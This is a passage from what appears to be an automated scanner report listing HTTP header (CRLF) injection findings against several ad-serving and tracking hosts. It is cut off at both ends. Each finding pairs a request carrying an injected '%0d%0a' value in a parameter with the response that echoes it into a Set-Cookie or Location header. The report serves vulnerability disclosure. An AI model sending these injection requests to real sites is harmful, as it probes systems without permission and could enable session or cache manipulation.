B3=8bvZ0000000001t68qiu0000000002t689PS000000000St87oaf0000000001t889PT000000000.t88fq40000000001t884fB0000000001t88mb20000000001t48i440000000001t28bwx0000000001t48fq50000000003t87PrH0000000001t782790000000002t5852G0000000003sS8fq70000000001t88qav0000000008tb7dNH0000000002sZ86Bm0000000001t684ZE0000000001t67GHq0000000001s.8j4q0000000001t67FCH0000000001s.84ZF0000000002t68nAl0000000002t68cVQ0000000001sV82980000000001t38fq20000000003t8852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY8fq30000000002t88qaw0000000004tc7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS8qay0000000001t787H10000000001td8n7e0000000002tb; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; eyeblaster=BWVal=1948&BWDate=40587.401238&debuglevel=&FLV=10.2154&RES=128&WMPV=037f57%0d%0a3fb48ff6f67

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=1948&BWDate=40587.401238&debuglevel=&FLV=10.2154&RES=128&WMPV=037f57
3fb48ff6f67; expires=Sat, 14-May-2011 20: 33:39 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=gPVtafzY0bnA00001gSdsafy50aSU00003gLnTaeKR09sO00001h5j3afvK07l00000.h5iUafy507l00000Sf+JvabEk02WG00002fFb9afAF02WG00001gDQzahdw07ZZ00001gYyfadw90cvM00001gDa8aeXd0aA900001gYRSaeKR09sO00001gL2MadKj0bdR00001hghLaeVW09SF00002g7VJafdh08.I00001h802ae7k0c6L00001gKXMaepH0bdR00001gFjwaeKR09sO00001gKXNaepP0bdR00001gYx+adw90cvM00001heXeaf5V0c9M00001heXfagzX0c9M00001gy3.ach00c9M00001gHrHaeKS09sO00001gSdkafvD0aSU00001h6moagvf0aMN00002heXgagXR0c9M00002heXhahnN0c9M00004gK8raeXe0aA900001gSdmafy60aSU00002heXiagzX0c9M00004heXjafWs0c9M00001gSdnafwN0aSU00003hbwIaeVY09SF00002gSdpafvK0aSU00001heXaaf9P0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001g+nBaeUD02Hn00001gNQ4ae7r0c9M00001ge4Hack+0bM000001; expires=Sat, 14-May-2011 20:33:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000St88qiu0000000002t68bvZ0000000001t689PT000000000.t87oaf0000000001t884fB0000000001t88fq40000000001t88fq50000000003t88bwx0000000001t48i440000000001t28mb20000000001t4852G0000000003sS82790000000002t57PrH0000000001t78fq70000000001t886Bm0000000001t67dNH0000000002sZ8qav0000000009td8j4q0000000001t67GHq0000000001s.84ZE0000000001t684ZF0000000002t67FCH0000000001s.8cVQ0000000001sV8nAl0000000002t682980000000001t384U10000000001t6852N0000000001s.8fq20000000003t88fq30000000002t86o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG8qaw0000000004tc852z0000000001sS8qay0000000001t7852A0000000001sS8n7e0000000002tb87H10000000001td; expires=Sat, 14-May-2011 20:33:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 14-May-2011 20:33:39 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 14 Feb 2011 01:33:39 GMT
Connection: close
Content-Length: 2219

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

1.39. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 7882f%0d%0adcb3cfdd72c was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=&$=7882f%0d%0adcb3cfdd72c&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:7882f
dcb3cfdd72c;expires=Mon, 14 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=64
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 4228

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat=',7882f

...[SNIP]...

1.40. http://c7.zedo.com/utils/ecSet.js [v parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload cefd9%0d%0a310d8c3cc8d was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=cefd9%0d%0a310d8c3cc8d&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFad=0:0:0; FFcat=305,2942,9:305,4506,17:1120,1,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: cefd9
310d8c3cc8d;expires=Wed, 16 Mar 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
X-Varnish: 1725802099
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=2283
Date: Mon, 14 Feb 2011 01:29:12 GMT
Connection: close

1.41. http://d.adroll.com/pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.adroll.com
Path:	/pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 148bc%0d%0a00a581bb834 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pixel/148bc%0d%0a00a581bb834/LJ7DC3I6ENDUDJRX7PVZRX?pv=1280671358.1085205&cookie=& HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://aboutecho.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=7eac527dab8242660d6ce169dd8ca402

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Mon, 14 Feb 2011 14:35:08 GMT
Connection: keep-alive
Set-Cookie: __adroll=7eac527dab8242660d6ce169dd8ca402; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/148bc
00a581bb834/LJ7DC3I6ENDUDJRX7PVZRX/DSTFX4IPGNDVXKJZOC5QMN.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

1.42. http://d.adroll.com/pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.adroll.com
Path:	/pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 90fad%0d%0a5b0b82ad641 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /pixel/DBLH4FNWEJG3HHKBYW3CFN/90fad%0d%0a5b0b82ad641?pv=1280671358.1085205&cookie=& HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://aboutecho.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=7eac527dab8242660d6ce169dd8ca402

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Mon, 14 Feb 2011 14:35:09 GMT
Connection: keep-alive
Set-Cookie: __adroll=7eac527dab8242660d6ce169dd8ca402; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/retarget/DBLH4FNWEJG3HHKBYW3CFN/90fad
5b0b82ad641/pixel.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

1.43. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload ae973%0d%0a0345b07197e was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=ae973%0d%0a0345b07197e&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:ae973
0345b07197e;expires=Mon, 14 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:20 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 2099

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',ae973
0345
...[SNIP]...

1.44. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 29b5a%0d%0ac4af126ee8c was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=29b5a%0d%0ac4af126ee8c&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:29b5a
c4af126ee8c;expires=Mon, 14 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:15:00 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=59
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:15:00 GMT
Connection: close
Content-Length: 2099

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',29b5a
c4af
...[SNIP]...

1.45. http://dw.com.com/clear/c.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dw.com.com
Path:	/clear/c.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload fcbbe%0d%0a18ae7dfebfb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /clear/fcbbe%0d%0a18ae7dfebfb?ptid=8301&onid=503544&asid=20031629&astid=28&x_breadcrumb=250%3A503544&ts=1297647365150&sid=162&ld=www.cbsnews.com&oid=8301-503544_162-20031629&brflv=10.2.154&brwinsz=1112x1010&brscrsz=1920x1200&brlang=en-US&tcset=utf8&im=dwjs&srcUrl=http%3A%2F%2Fwww.cbsnews.com%2F8301-503544_162-20031629-503544.html&title=Mitch%20Daniels%3A%20Debt%20is%20the%20New%20%22Red%20Menace%22%20-%20Political%20Hotsheet%20-%20CBS%20News HTTP/1.1
Host: dw.com.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw

Response

HTTP/1.1 302 Found
Date: Mon, 14 Feb 2011 01:37:05 GMT
Server: Apache/2.0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, no-transform
Vary: *
Expires: Fri, 23 Jan 1970 12:12:12 GMT
Location: http://dw.cbsnews.com/clear/fcbbe
18ae7dfebfb?ts=1297647425497435&clgf=Cg5iVU0qL2O/AAAAdRw
Content-Length: 0
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Type: image/gif

1.46. http://live.activeconversion.com/webtracker/track2.html [avc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://live.activeconversion.com
Path:	/webtracker/track2.html

Issue detail

The value of the avc request parameter is copied into the Set-Cookie response header. The payload 6ab95%0d%0af1c7ac10bc3 was submitted in the avc parameter. This caused a response containing an injected HTTP header.

Request

